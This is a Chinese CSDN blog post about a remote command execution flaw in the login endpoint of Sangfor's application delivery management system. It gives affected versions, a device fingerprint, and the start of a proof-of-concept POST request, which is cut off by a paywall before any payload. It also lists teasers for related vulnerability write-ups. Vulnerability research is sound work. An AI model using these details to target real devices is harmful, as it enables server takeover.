深信服应用交付管理系统 login 远程命令执行漏洞(含批量验证poc)

已于 2024-04-15 20:56:10 修改
阅读量512 收藏
点赞数 17
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-15 20:55:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137795243
版权
该博客揭示了深信服应用交付管理系统7.0.8-7.0.8R5版本存在远程命令执行漏洞,攻击者可借此获取服务器权限。文章介绍了漏洞描述、影响版本、复现步骤以及Tscan POC,并提供了修复建议。
摘要由CSDN通过智能技术生成

漏洞描述

深信服 应⽤交付管理系统 login 存在远程命令执⾏漏洞,攻击者通过漏洞可以获取服务器权
限,执⾏任意命令

漏洞影响版本

深信服 应⽤交付管理系统 7.0.8-7.0.8R5
fid=”iaytNA57019/kADk8Nev7g==”

漏洞复现

输入账号密码拦截登录请求包,然后更改数据包。
漏洞验证poc

POST /rep/login HTTP/1.1
Host: XX.XX.XX.XX
Connection: close
Content-Length: 121
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: sam
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 17
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
深信服应用交付管理系统远程命令执行漏洞复现
薛定谔嘚喵博客
09-07 1052
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
深信服应用交付报表系统存在任意文件读取漏洞
nnn2188185的博客
06-15 1081
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发深信服应用交付报表系统。
深信服应用交付报表系统 命令执行漏洞复现
09-28 1359
深信服应用交付报表系统是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。该系统能够为用户提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。不仅实现对各个数据中心、链路以及服务器状态的实时监控,同时根据预设规则,将用户的访问请求分配给相应的数据中心、链路以及服务。
深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
weixin_46801402的博客
11-04 2760
深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
深信服 应用交付报表系统 download.php 任意文件读取漏洞
weixin_46801402的博客
11-04 1282
深信服 应用交付报表系统 download.php 任意文件读取漏洞
深信服应用交付报表任意文件读取漏洞
pingan233的博客
03-10 798
深信服应用交付报表任意文件读取漏洞1.深信服应用交付报表任意文件读取漏洞1.1.漏洞描述1.2.漏洞影响1.3.FOFA2.漏洞复现2.1.登录页面2.2.POC1.深信服应用交付报表任意文件读取漏洞1.1.漏洞描述深信服应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。1.2.漏洞影响深信服应用交付报表系统1.3.FOFAapp=“SANGFOR-应用交付报表系统”2.漏洞复现。
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
深信服应用交付AD用户手册_V7.0.8R3-20201223.pdf
03-18
深信服应用交付AD用户手册_V7.0.8R3-20201223.pdf
深信服AD应用交付管理维护
✍千里之行,始于足下 ^,^
07-05 3442
深信服AD应用交付管理维护1.监视器1.1 节点监视器(1) ping,ping6节点监视器(2)http,https节点监视器(3)FTP节点监视器(4)DNS节点监视器(5)Radius节点监视器1.2 链路监视器2.常用功能2.1 路由配置(1)静态路由(2)动态路由2.2 NAT配置2.3 网络安全2.4 配置备份与恢复2.5 设备升级(1)AD应用交付控制台页面升级(2) AD应用交付升...
堡垒机下的任意文件读取漏洞挖掘
潇湘信安的博客
06-05 365
测试的这个资产纳管到4A了,进入这个系统就是远程堡垒机的浏览器,不能用其他工具测试,纯手搓。
【1day】复现深信服应用交付管理系统 login 远程命令执行漏洞和账号密码泄漏漏洞
记录并分享学习安全的知识点..
08-16 730
深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏;深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
漏洞复现 || SXF应用交付系统RCE(0Day)
失心少年
08-24 361
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!SXF应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。1.利用如下POC发起POST请求。
技术分享 某下一代防火墙远程命令执行漏洞分析及防护绕过_深信服下一代防火墙ngaf login远程命令执行漏洞(1)
最新发布
2301_76224593的博客
04-29 857
1=hex2bin // 绕过写法。
【1day】复现深信服数据中心管理系统 XXE漏洞——可读取文件
记录并分享学习安全的知识点..
08-16 362
深信服的数据中心管理系统DC是一种外置的AC(异地扩展备份管理)数据中心,它提供了强大的功能和灵活性,旨在满足日志数据处理的需求。该系统具备多种高级功能,包括多条件组合的高效查询、统计和生成趋势报表,以及实时监控设备的运行状态等。深信服数据中心管理系统存在XXE漏洞
深信服应用交付 AD 存在远程命令执行漏洞POC
nnn2188185的博客
09-28 515
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
Struts2与Webwork远程命令执行漏洞解析
"Struts2和Webwork远程命令执行漏洞分析" 在Java Web开发领域,Struts2是一个广泛应用的MVC框架,而Webwork是其前身。然而,这些框架并非无懈可击,其中存在一些安全漏洞,特别是关于远程命令执行(RCE)的漏洞。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值